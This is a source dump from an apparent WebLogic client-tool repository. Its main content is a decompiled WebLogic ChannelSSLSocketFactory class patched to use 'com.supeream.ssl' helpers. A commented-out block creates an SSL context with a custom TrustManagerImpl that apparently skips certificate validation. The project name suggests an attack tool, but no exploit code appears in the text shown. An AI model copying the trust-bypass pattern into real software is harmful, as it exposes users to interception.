if ((var1 & 16) != 0) {
SSLSetup.info("Certificate chain is untrusted");
}
if ((var1 & 32) != 0) {
SSLSetup.info("Certificate chain was not validated by the custom trust manager even though built-in SSL validated it.");
}
}
}
}
================================================
FILE: src/weblogic/socket/ChannelSSLSocketFactory.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.socket;
import java.io.IOException;
import java.net.InetAddress;
import java.net.Socket;
import java.net.SocketException;
import java.net.UnknownHostException;
import java.security.AccessController;
import java.security.SecureRandom;
import com.supeream.ssl.SocketFactory;
import com.supeream.ssl.TrustManagerImpl;
import weblogic.kernel.KernelStatus;
import weblogic.protocol.ServerChannel;
import weblogic.security.SSL.SSLClientInfo;
import weblogic.security.SSL.SSLSocketFactory;
import weblogic.security.acl.internal.AuthenticatedSubject;
import weblogic.security.acl.internal.Security;
import weblogic.security.service.PrivilegedActions;
import weblogic.security.service.SecurityServiceManager;
import weblogic.security.utils.SSLContextManager;
import weblogic.security.utils.SSLSetup;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
public final class ChannelSSLSocketFactory extends SSLSocketFactory {
private static final AuthenticatedSubject kernelId = (AuthenticatedSubject)AccessController.doPrivileged(PrivilegedActions.getKernelIdentityAction());
private ServerChannel channel;
private SSLClientInfo sslInfo;
public ChannelSSLSocketFactory(ServerChannel var1) {
super((javax.net.ssl.SSLSocketFactory)null);
if(var1 == null) {
throw new IllegalArgumentException("Channel must not be null");
} else {
this.channel = var1;
}
}
public Socket createSocket(String var1, int var2) throws IOException, UnknownHostException {
return this.createSocket(InetAddress.getByName(var1), var2);
}
public SSLSocketFactory initializeFromThread() throws IOException {
this.sslInfo = this.createSSLClientInfo();
return this;
}
public Socket createSocket(String var1, int var2, InetAddress var3, int var4) {
throw new UnsupportedOperationException("Binding characteristics are determined by the channel");
}
public Socket createSocket(InetAddress var1, int var2) throws IOException {
javax.net.ssl.SSLSocketFactory var3 = this.getSocketFactory();
// javax.net.ssl.SSLSocketFactory var3 = this.g
return KernelStatus.isServer() && this.channel.isOutboundEnabled()?var3.createSocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0):var3.createSocket(var1, var2);
}
public Socket createSocket(InetAddress var1, int var2, InetAddress var3, int var4) {
throw new UnsupportedOperationException("Binding characteristics are determined by the channel");
}
public Socket createSocket(InetAddress var1, int var2, int var3) throws IOException {
// try {
// SSLContext context = SSLContext.getInstance("SSL");
// // 初始化
// context.init(null,
// new TrustManager[]{new TrustManagerImpl()},
// new SecureRandom());
// javax.net.ssl.SSLSocketFactory factory = context.getSocketFactory();
// Socket socket = factory.createSocket(host, port);
// return socket;
// }catch (Exception e) {
// e.printStackTrace();
// }
// return null;
int var4 = var3 > 0?var3:this.channel.getConnectTimeout() * 1000;
if(var4 == 0) {
return this.createSocket(var1, var2);
} else {
Socket var5;
if(KernelStatus.isServer() && this.channel.isOutboundEnabled()) {
if(this.channel.getProxyAddress() != null) {
var5 = SocketMuxer.getMuxer().newProxySocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0, InetAddress.getByName(this.channel.getProxyAddress()), this.channel.getProxyPort(), var4);
} else {
var5 = SocketMuxer.getMuxer().newSocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0, var4);
}
} else {
var5 = SocketMuxer.getMuxer().newSocket(var1, var2, var4);
}
return this.createSocket(var5, var1.getHostName(), var2, true);
}
}
public String[] getDefaultCipherSuites() {
try {
return this.getSocketFactory().getDefaultCipherSuites();
} catch (IOException var2) {
throw (RuntimeException)(new IllegalStateException()).initCause(var2);
}
}
public String[] getSupportedCipherSuites() {
try {
return this.getSocketFactory().getSupportedCipherSuites();
} catch (IOException var2) {
throw (RuntimeException)(new IllegalStateException()).initCause(var2);
}
}
public Socket createSocket(Socket var1, String var2, int var3, boolean var4) throws IOException {
return this.getSocketFactory().createSocket(var1, var2, var3, var4);
}
private javax.net.ssl.SSLSocketFactory getSocketFactory() throws IOException {
if(this.sslInfo == null) {
this.sslInfo = this.createSSLClientInfo();
this.sslInfo.setNio(SocketMuxer.getMuxer().isAsyncMuxer());
}
return this.sslInfo.getSSLSocketFactory();
}
public SSLClientInfo getSSLClientInfo() {
return this.sslInfo;
}
private SSLClientInfo createSSLClientInfo() throws IOException {
SSLClientInfo var1 = Security.getThreadSSLClientInfo();
if((!KernelStatus.isServer() || var1 != null && !var1.isEmpty() || kernelId != SecurityServiceManager.getCurrentSubject(kernelId)) && (!this.channel.isOutboundEnabled() || !this.channel.isOutboundPrivateKeyEnabled())) {
return var1;
} else {
try {
return SSLContextManager.getChannelSSLClientInfo(this.channel, kernelId);
} catch (Exception var3) {
throw (IOException)(new IOException(var3.getMessage())).initCause(var3);
}
}
}
public void setSSLClientInfo(SSLClientInfo var1) {
try {
if(SocketMuxer.getMuxer().isAsyncMuxer()) {
if(var1 != null && !var1.isNioSet()) {
var1.setNio(true);
}
this.jsseFactory = var1 == null?SSLSetup.getSSLContext(var1).getSSLNioSocketFactory():var1.getSSLSocketFactory();
} else {
this.jsseFactory = var1 == null?SSLSetup.getSSLContext(var1).getSSLSocketFactory():var1.getSSLSocketFactory();
}
} catch (SocketException var3) {
SSLSetup.debug(3, var3, "Failed to create context");
throw new RuntimeException("Failed to update factory: " + var3.getMessage());
}
}
}
================================================
FILE: weblogic_cmd.iml
================================================